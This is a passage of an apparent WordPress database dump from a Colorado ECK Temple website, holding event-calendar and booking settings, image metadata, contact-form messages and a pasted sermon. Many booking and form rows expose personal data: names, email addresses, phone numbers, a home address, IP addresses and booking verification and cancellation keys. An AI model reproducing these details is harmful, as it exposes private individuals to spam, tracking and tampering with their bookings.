WP-Optimize'),(180830,268280,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:173670;s:12:\"smushed-size\";i:163041;s:15:\"savings-percent\";d:6.12;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:173670;s:10:\"compressed\";i:163041;}s:6:\"medium\";a:2:{s:8:\"original\";i:21241;s:10:\"compressed\";i:20719;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9462;s:10:\"compressed\";i:9396;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:123584;s:10:\"compressed\";i:119144;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:35408;s:10:\"compressed\";i:34266;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:60511;s:10:\"compressed\";i:58448;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:40843;s:10:\"compressed\";i:39463;}s:8:\"tileview\";a:2:{s:8:\"original\";i:43884;s:10:\"compressed\";i:42373;}}}'),(180831,266522,'passster_area_shortcode',''),(180832,266467,'passster_area_shortcode',''),(180835,268282,'mec_location_id','122'),(180836,268282,'mec_dont_show_map','0'),(180837,268282,'mec_organizer_id','1'),(180838,268282,'mec_read_more',''),(180839,268282,'mec_more_info',''),(180840,268282,'mec_more_info_title',''),(180841,268282,'mec_more_info_target','_self'),(180842,268282,'mec_cost',''),(180843,268282,'mec_currency','a:0:{}'),(180844,268282,'mec_additional_organizer_ids','a:0:{}'),(180845,268282,'mec_additional_location_ids','a:0:{}'),(180846,268282,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-05-13\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-05-13\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(180847,268282,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(180848,268282,'mec_certain_weekdays','a:0:{}'),(180849,268282,'mec_allday','0'),(180850,268282,'one_occurrence','0'),(180851,268282,'mec_hide_time','0'),(180852,268282,'mec_hide_end_time','0'),(180853,268282,'mec_comment',''),(180854,268282,'mec_timezone','global'),(180855,268282,'mec_countdown_method','global'),(180856,268282,'mec_public','1'),(180857,268282,'mec_start_date','2023-05-13'),(180858,268282,'mec_start_time_hour','10'),(180859,268282,'mec_start_time_minutes','0'),(180860,268282,'mec_start_time_ampm','AM'),(180861,268282,'mec_start_day_seconds','36000'),(180862,268282,'mec_end_date','2023-05-13'),(180863,268282,'mec_end_time_hour','2'),(180864,268282,'mec_end_time_minutes','0'),(180865,268282,'mec_end_time_ampm','PM'),(180866,268282,'mec_end_day_seconds','50400'),(180867,268282,'mec_repeat_status','0'),(180868,268282,'mec_repeat_type',''),(180869,268282,'mec_repeat_interval','1'),(180870,268282,'mec_repeat_end',''),(180871,268282,'mec_repeat_end_at_occurrences',''),(180872,268282,'mec_repeat_end_at_date',''),(180873,268282,'mec_advanced_days','a:0:{}'),(180874,268282,'mec_in_days',''),(180875,268282,'mec_not_in_days',''),(180876,268282,'mec_hourly_schedules','a:0:{}'),(180877,268282,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(180878,268282,'mec_tickets','a:0:{}'),(180879,268282,'mec_fees_global_inheritance','1'),(180880,268282,'mec_fees','a:0:{}'),(180881,268282,'mec_ticket_variations_global_inheritance','1'),(180882,268282,'mec_ticket_variations','a:0:{}'),(180883,268282,'mec_reg_fields_global_inheritance','1'),(180884,268282,'mec_reg_fields','a:0:{}'),(180885,268282,'mec_bfixed_fields','a:0:{}'),(180886,268282,'mec_op','a:0:{}'),(180887,268282,'mec_fields','a:0:{}'),(180888,268282,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(180889,268282,'mec_event_status','EventScheduled'),(180890,268282,'mec_moved_online_link',''),(180891,268282,'mec_cancelled_reason',''),(180892,268282,'mec_display_cancellation_reason_in_single_page',''),(180893,268282,'protect_children',''),(180894,268282,'passster_activate_global_protection',NULL),(180895,268282,'passster_activate_protection',NULL),(180896,268282,'passster_protection_type','password'),(180897,268282,'boldgrid_hide_page_title','0'),(180898,268282,'boldgrid_in_page_containers','1'),(180899,268282,'_wp_old_slug','test-without-using-booking-component-3-29-22'),(180900,268282,'passster_area_shortcode',''),(180901,268282,'_dp_original','266467'),(180902,268282,'_edit_lock','1682283316:2'),(180903,268282,'_edit_last','2'),(180904,268283,'_field_224','Kathleen'),(180905,268283,'_field_225','Holmby'),(180906,268283,'_field_226','awai.etc@gmail.com'),(180907,268283,'_field_227','CA'),(180908,268283,'_field_228','US'),(180909,268283,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(180910,268283,'_form_id','21'),(180911,268283,'_seq_num','166'),(180912,268284,'_field_133','howard'),(180913,268284,'_field_134','hancock'),(180914,268284,'_field_135','h.hancock@apex.net'),(180915,268284,'_field_137','Warnings'),(180916,268284,'_field_138','Heed the Warnings\nby Pastor Greg Laurie\n\n“Since everything around us is going to be destroyed like this, what holy and godly lives you should live, looking forward to the day of God and hurrying it along.” \n—2 Peter 3:11–12\n\nI heard about some Christians who were standing by the side of a road, holding up a hand-lettered sign with these words: The End Is Near. Turn around before It’s Too Late.\n\nSomeone drove by them, hit the brakes, rolled down his window, and shouted, “You stupid Christians! Why don’t you just leave people alone?”\n\nThen he rolled up his window and hit the accelerator. A couple of moments passed, and they heard a loud splash. One of them turned to the others and said, “Maybe we should just put up a sign that says bridge out instead.”\n\nWe can find a lot of signs, a lot of warnings, that are saying one thing: get ready because Jesus Christ is coming back. Just look at our world today. New terms have entered our vocabulary such as pandemic, social distancing, and herd immunity.\n\nHere’s another word that we’re hearing more often: plagues. We’ve heard the Old Testament story of the plagues that came upon Egypt. But we’ve also had plagues throughout history. And the Bible tells us that in the last days, there will be an increase of plagues.\n\nA headline last March in The Jerusalem Post asked, “Why do some Christians believe coronavirus is an apocalyptic prophecy?”\n\nThe answer is because the Bible says we would see this sort of thing in the last days. In fact, the Bible tells us to look for a lot of things. It compares end-times events to labor pains that get closer and closer together when a woman is ready to give birth.\n\nThe Bible says that when you see these things not only happen, but happen with more intensity, that’s a sign the end is near.\n\nWhen we’re right with God, we look forward to His return. It keeps us on our toes spiritually. And it causes us to want to live godly lives.\n\n'),(180917,268284,'_form_id','13'),(180918,268284,'_seq_num','132'),(180919,268285,'mec_transaction_id','ZQS12163'),(180920,268285,'mec_user_id','1000077'),(180921,268285,'mec_verified','1'),(180922,268285,'mec_verification_key','404e3e6efeee44130b284915de055848'),(180923,268285,'mec_cancellation_key','8bfcd1ba822c82ae92590661e9ffc8d2'),(180924,268285,'mec_confirmed','1'),(180925,268285,'mec_event_id','268197'),(180926,268285,'mec_date','1681036200:1681039800'),(180927,268285,'mec_ticket_id',',1,'),(180928,268285,'mec_booking_time','2023-03-30 08:05:10'),(180929,268285,'mec_all_dates','a:0:{}'),(180930,268285,'mec_other_dates','a:0:{}'),(180931,268285,'mec_attention_time','1681036200:1681039800'),(180932,268285,'mec_attention_time_start','1681036200'),(180933,268285,'mec_attention_time_end','1681039800'),(180934,268285,'mec_book_date_submit','20230330080510'),(180935,268285,'mec_booking_location','129'),(180936,268285,'mec_ticket_price_1','0'),(180937,268285,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:17:\"gvg1328@telus.net\";s:4:\"name\";s:15:\"Gerald van Gogh\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:15:\"108.180.206.226\";}}'),(180938,268285,'mec_price','0'),(180939,268285,'mec_gateway','MEC_gateway_free'),(180940,268285,'mec_gateway_label','Free'),(180941,268286,'_field_212','Rhonda'),(180942,268286,'_field_213','Miller'),(180943,268286,'_field_214','rhoann9@gmail.com'),(180944,268286,'_field_215','(303) 946-0436'),(180945,268286,'_field_216','Boulder'),(180946,268286,'_field_219','ESA-Initiator-Melony Mont-Eton'),(180947,268286,'_field_220','Melony, I am please requesting an ESA session at your convenience. Is it possible to meet at the (Lakewood/Denver) ECK Center (on Mississippi Ave.) at a scheduled morning time? Thank you. '),(180948,268286,'_form_id','20'),(180949,268286,'_seq_num','5'),(184269,268593,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(180962,268077,'_edit_lock','1680475463:2'),(180963,268077,'passster_area_shortcode',''),(180964,268295,'_wp_attached_file','2023/03/HI-Conf-Overview-FINAL-2-14-23.pdf'),(180965,268295,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:38:\"HI-Conf-Overview-FINAL-2-14-23-pdf.jpg\";s:5:\"width\";i:1088;s:6:\"height\";i:1408;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:251086;}s:6:\"medium\";a:5:{s:4:\"file\";s:46:\"HI-Conf-Overview-FINAL-2-14-23-pdf-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20201;}s:5:\"large\";a:5:{s:4:\"file\";s:47:\"HI-Conf-Overview-FINAL-2-14-23-pdf-791x1024.jpg\";s:5:\"width\";i:791;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:145338;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:46:\"HI-Conf-Overview-FINAL-2-14-23-pdf-116x150.jpg\";s:5:\"width\";i:116;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7925;}}s:8:\"filesize\";i:373613;}'),(180952,268290,'_wp_attached_file','2023/03/2023-HI-Conf-Program-final2-web.pdf'),(180953,268290,'_wp_attachment_metadata','a:2:{s:5:\"sizes\";a:4:{s:4:\"full\";a:5:{s:4:\"file\";s:39:\"2023-HI-Conf-Program-final2-web-pdf.jpg\";s:5:\"width\";i:1440;s:6:\"height\";i:1120;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:333103;}s:6:\"medium\";a:5:{s:4:\"file\";s:47:\"2023-HI-Conf-Program-final2-web-pdf-300x233.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22720;}s:5:\"large\";a:5:{s:4:\"file\";s:48:\"2023-HI-Conf-Program-final2-web-pdf-1024x796.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:796;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:177045;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:47:\"2023-HI-Conf-Program-final2-web-pdf-150x117.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8201;}}s:8:\"filesize\";i:1745275;}'),(184267,268593,'mec_display_cancellation_reason_in_single_page',''),(181020,268377,'_field_496','Agnes'),(180966,268298,'_edit_lock','1680711999:2'),(180967,268298,'_edit_last','2'),(180968,268298,'boldgrid_hide_page_title','0'),(180969,268298,'boldgrid_in_page_containers','1'),(180970,31882,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(180997,261866,'ao_post_optimize','a:6:{s:16:\"ao_post_optimize\";s:2:\"on\";s:19:\"ao_post_js_optimize\";s:2:\"on\";s:20:\"ao_post_css_optimize\";s:2:\"on\";s:12:\"ao_post_ccss\";s:2:\"on\";s:16:\"ao_post_lazyload\";s:2:\"on\";s:15:\"ao_post_preload\";s:0:\"\";}'),(188198,268837,'mec_start_day_seconds','46800'),(188197,268837,'mec_start_time_ampm','PM'),(180995,268349,'boldgrid_hide_page_title','0'),(180996,268349,'boldgrid_in_page_containers','1'),(180993,268349,'_edit_lock','1695008541:2'),(180994,268349,'_edit_last','2'),(180987,268313,'_wp_attached_file','2023/03/co-springs-location-2023-v5.jpg'),(180988,268313,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:554;s:6:\"height\";i:323;s:4:\"file\";s:39:\"2023/03/co-springs-location-2023-v5.jpg\";s:8:\"filesize\";i:50147;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"co-springs-location-2023-v5-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14960;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"co-springs-location-2023-v5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6945;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:39:\"co-springs-location-2023-v5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21301;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:39:\"co-springs-location-2023-v5-474x323.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:323;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40298;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:39:\"co-springs-location-2023-v5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24703;}s:8:\"tileview\";a:5:{s:4:\"file\";s:39:\"co-springs-location-2023-v5-300x323.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:323;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24947;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(180989,268313,'original-file','2023/03/co-springs-location-2023-v5-updraft-pre-smush-original.jpg'),(180990,268313,'smush-complete','1'),(180991,268313,'smush-info','The file was compressed from 48.97 KB to 47.52 KB saving 2.97 percent using WP-Optimize'),(180992,268313,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:50147;s:12:\"smushed-size\";i:48657;s:15:\"savings-percent\";d:2.97;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:50147;s:10:\"compressed\";i:48657;}s:6:\"medium\";a:2:{s:8:\"original\";i:14960;s:10:\"compressed\";i:14960;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6945;s:10:\"compressed\";i:6945;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:21301;s:10:\"compressed\";i:21301;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:40298;s:10:\"compressed\";i:39975;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24703;s:10:\"compressed\";i:24690;}s:8:\"tileview\";a:2:{s:8:\"original\";i:24947;s:10:\"compressed\";i:24921;}}}'),(180998,268375,'mec_transaction_id','SMD96569'),(180999,268375,'mec_user_id','1000020'),(181000,268375,'mec_verified','1'),(181001,268375,'mec_verification_key','af1a6c2c13ba7fe133268e62b43140bf'),(181002,268375,'mec_cancellation_key','c14c0a074fe0ec16313dbe73982f240d'),(181003,268375,'mec_confirmed','1'),(181004,268375,'mec_event_id','268197'),(181005,268375,'mec_date','1681036200:1681039800'),(181006,268375,'mec_ticket_id',',1,'),(181007,268375,'mec_booking_time','2023-04-07 15:41:19'),(181008,268375,'mec_all_dates','a:0:{}'),(181009,268375,'mec_other_dates','a:0:{}'),(181010,268375,'mec_attention_time','1681036200:1681039800'),(181011,268375,'mec_attention_time_start','1681036200'),(181012,268375,'mec_attention_time_end','1681039800'),(181013,268375,'mec_book_date_submit','20230407154119'),(181014,268375,'mec_booking_location','129'),(181015,268375,'mec_ticket_price_1','0'),(181016,268375,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"joanna3064@gmail.com\";s:4:\"name\";s:6:\"Joanne\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"75.225.170.214\";}}'),(181017,268375,'mec_price','0'),(181018,268375,'mec_gateway','MEC_gateway_free'),(181019,268375,'mec_gateway_label','Free'),(181021,268377,'_field_497','Hynes'),(181022,268377,'_field_498','(303) 434-2448'),(181023,268377,'_field_499','amhynes7@msn.com'),(181024,268377,'_field_500','496 W Caley Cir'),(181025,268377,'_field_501','Littleton'),(181026,268377,'_field_502','CO'),(181027,268377,'_field_503','US'),(181028,268377,'_field_505','Hello, Can you please add me to the mailing list to receive the Colorado Eck Temple worship events newsletter. Somehow, I am no longer receiving it, \n\nThank you.\nAgnes Hynes'),(181029,268377,'_form_id','53'),(181030,268377,'_seq_num','9'),(181031,268378,'mec_transaction_id','ZGQ88479'),(181032,268378,'mec_user_id','1000078'),(181033,268378,'mec_verified','1'),(181034,268378,'mec_verification_key','5a0088c0c109c4d1dd63e1742546fe35'),(181035,268378,'mec_cancellation_key','1efbf129c05a5d2addbbc77fa6c452c0'),(181036,268378,'mec_confirmed','1'),(181037,268378,'mec_event_id','268197'),(181038,268378,'mec_date','1681036200:1681039800'),(181039,268378,'mec_ticket_id',',1,'),(181040,268378,'mec_booking_time','2023-04-08 15:45:27'),(181041,268378,'mec_all_dates','a:0:{}'),(181042,268378,'mec_other_dates','a:0:{}'),(181043,268378,'mec_attention_time','1681036200:1681039800'),(181044,268378,'mec_attention_time_start','1681036200'),(181045,268378,'mec_attention_time_end','1681039800'),(181046,268378,'mec_book_date_submit','20230408154527'),(181047,268378,'mec_booking_location','129'),(181048,268378,'mec_ticket_price_1','0'),(181049,268378,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:16:\"amhynes7@msn.com\";s:4:\"name\";s:11:\"Agnes Hynes\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"71.205.145.147\";}}'),(181050,268378,'mec_price','0'),(181051,268378,'mec_gateway','MEC_gateway_free'),(181052,268378,'mec_gateway_label','Free'),(181053,268379,'_field_224','Agnes'),(181054,268379,'_field_225','Hynes'),(181055,268379,'_field_226','amhynes7@msn.com'),(181056,268379,'_field_227','CO'),(181057,268379,'_field_228','US'),(181058,268379,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(181059,268379,'_form_id','21'),(181060,268379,'_seq_num','167'),(181061,268382,'mec_transaction_id','AOX10183'),(181062,268382,'mec_user_id','1000079'),(181063,268382,'mec_verified','1'),(181064,268382,'mec_verification_key','f3e0edc6d506ddd9b605e3e85b8a04bb'),(181065,268382,'mec_cancellation_key','335efc3ae1822247ab343b75be693360'),(181066,268382,'mec_confirmed','1'),(181067,268382,'mec_event_id','268197'),(181068,268382,'mec_date','1681036200:1681039800'),(181069,268382,'mec_ticket_id',',1,'),(181070,268382,'mec_booking_time','2023-04-08 22:06:47'),(181071,268382,'mec_all_dates','a:0:{}'),(181072,268382,'mec_other_dates','a:0:{}'),(181073,268382,'mec_attention_time','1681036200:1681039800'),(181074,268382,'mec_attention_time_start','1681036200'),(181075,268382,'mec_attention_time_end','1681039800'),(181076,268382,'mec_book_date_submit','20230408220647'),(181077,268382,'mec_booking_location','129'),(181078,268382,'mec_ticket_price_1','0'),(181079,268382,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"utah.eckpres@gmail.com\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"73.98.136.116\";}}'),(181080,268382,'mec_price','0'),(181081,268382,'mec_gateway','MEC_gateway_free'),(181082,268382,'mec_gateway_label','Free'),(181083,268383,'mec_transaction_id','HVO20373'),(181084,268383,'mec_user_id','1000023'),(181085,268383,'mec_verified','1'),(181086,268383,'mec_verification_key','438d40f13c75447f61ef6fb17008008e'),(181087,268383,'mec_cancellation_key','0df6a6d7f7a9f38e1777c8b50e62df52'),(181088,268383,'mec_confirmed','1'),(181089,268383,'mec_event_id','268197'),(181090,268383,'mec_date','1681036200:1681039800'),(181091,268383,'mec_ticket_id',',1,'),(181092,268383,'mec_booking_time','2023-04-09 07:11:52'),(181093,268383,'mec_all_dates','a:0:{}'),(181094,268383,'mec_other_dates','a:0:{}'),(181095,268383,'mec_attention_time','1681036200:1681039800'),(181096,268383,'mec_attention_time_start','1681036200'),(181097,268383,'mec_attention_time_end','1681039800'),(181098,268383,'mec_book_date_submit','20230409071152'),(181099,268383,'mec_booking_location','129'),(181100,268383,'mec_ticket_price_1','0'),(181101,268383,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:9:\"Bonnie G.\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"184.55.36.58\";}}'),(181102,268383,'mec_price','0'),(181103,268383,'mec_gateway','MEC_gateway_free'),(181104,268383,'mec_gateway_label','Free'),(181105,268384,'mec_transaction_id','FEZ57564'),(181106,268384,'mec_user_id','1000080'),(181107,268384,'mec_verified','1'),(181108,268384,'mec_verification_key','e641beeb4dc5e8967369d2f8f6d647dd'),(181109,268384,'mec_cancellation_key','179547f30ba828549caaa81fbd65c1bb'),(181110,268384,'mec_confirmed','1'),(181111,268384,'mec_event_id','268197'),(181112,268384,'mec_date','1681036200:1681039800'),(181113,268384,'mec_ticket_id',',1,'),(181114,268384,'mec_booking_time','2023-04-09 10:23:26'),(181115,268384,'mec_all_dates','a:0:{}'),(181116,268384,'mec_other_dates','a:0:{}'),(181117,268384,'mec_attention_time','1681036200:1681039800'),(181118,268384,'mec_attention_time_start','1681036200'),(181119,268384,'mec_attention_time_end','1681039800'),(181120,268384,'mec_book_date_submit','20230409102326'),(181121,268384,'mec_booking_location','129'),(181122,268384,'mec_ticket_price_1','0'),(181123,268384,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:23:\"c.lotusheart@icloud.com\";s:4:\"name\";s:11:\"Cindy Mason\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"75.161.92.72\";}}'),(181124,268384,'mec_price','0'),(181125,268384,'mec_gateway','MEC_gateway_free'),(181126,268384,'mec_gateway_label','Free'),(181127,268385,'mec_transaction_id','FZE83069'),(181128,268385,'mec_user_id','1000047'),(181129,268385,'mec_verified','1'),(181130,268385,'mec_verification_key','3818f7b0f0b09a5e4bd76a581ba3050c'),(181131,268385,'mec_cancellation_key','7f832703e7b3765b544ed0d31449ee57'),(181132,268385,'mec_confirmed','1'),(181133,268385,'mec_event_id','268197'),(181134,268385,'mec_date','1681036200:1681039800'),(181135,268385,'mec_ticket_id',',1,'),(181136,268385,'mec_booking_time','2023-04-09 10:25:32'),(181137,268385,'mec_all_dates','a:0:{}'),(181138,268385,'mec_other_dates','a:0:{}'),(181139,268385,'mec_attention_time','1681036200:1681039800'),(181140,268385,'mec_attention_time_start','1681036200'),(181141,268385,'mec_attention_time_end','1681039800'),(181142,268385,'mec_book_date_submit','20230409102532'),(181143,268385,'mec_booking_location','129'),(181144,268385,'mec_ticket_price_1','0'),(181145,268385,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"beth1848@yahoo.com\";s:4:\"name\";s:15:\"Beth Massengale\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"35.136.41.82\";}}'),(181146,268385,'mec_price','0'),(181147,268385,'mec_gateway','MEC_gateway_free'),(181148,268385,'mec_gateway_label','Free'),(181149,268386,'mec_transaction_id','NXB88494'),(181150,268386,'mec_user_id','1000081'),(181151,268386,'mec_verified','1'),(181152,268386,'mec_verification_key','c74d0b44a57ab779dbb6244e42e5ead8'),(181153,268386,'mec_cancellation_key','ce64c4571e8a90273bf5498d4da9f498'),(181154,268386,'mec_confirmed','1'),(181155,268386,'mec_event_id','268197'),(181156,268386,'mec_date','1681036200:1681039800'),(181157,268386,'mec_ticket_id',',1,'),(181158,268386,'mec_booking_time','2023-04-09 10:37:25'),(181159,268386,'mec_all_dates','a:0:{}'),(181160,268386,'mec_other_dates','a:0:{}'),(181161,268386,'mec_attention_time','1681036200:1681039800'),(181162,268386,'mec_attention_time_start','1681036200'),(181163,268386,'mec_attention_time_end','1681039800'),(181164,268386,'mec_book_date_submit','20230409103725'),(181165,268386,'mec_booking_location','129'),(181166,268386,'mec_ticket_price_1','0'),(181167,268386,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"eileenjoy12@gmail.com\";s:4:\"name\";s:10:\"Eileen Joy\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"72.212.112.205\";}}'),(181168,268386,'mec_price','0'),(181169,268386,'mec_gateway','MEC_gateway_free'),(181170,268386,'mec_gateway_label','Free'),(181182,268391,'_field_224','Lisa'),(181183,268391,'_field_225','Gage'),(181184,268391,'_field_226','lisa1lg3@gmail.com'),(181185,268391,'_field_227','CO'),(181186,268391,'_field_228','US'),(181187,268391,'_field_229','a:1:{i:0;s:8:\"Loveland\";}'),(181188,268391,'_form_id','21'),(181189,268391,'_seq_num','168'),(181194,268393,'_field_34','6454 Mountain Dale Dr'),(181195,268393,'_field_35','Colorado 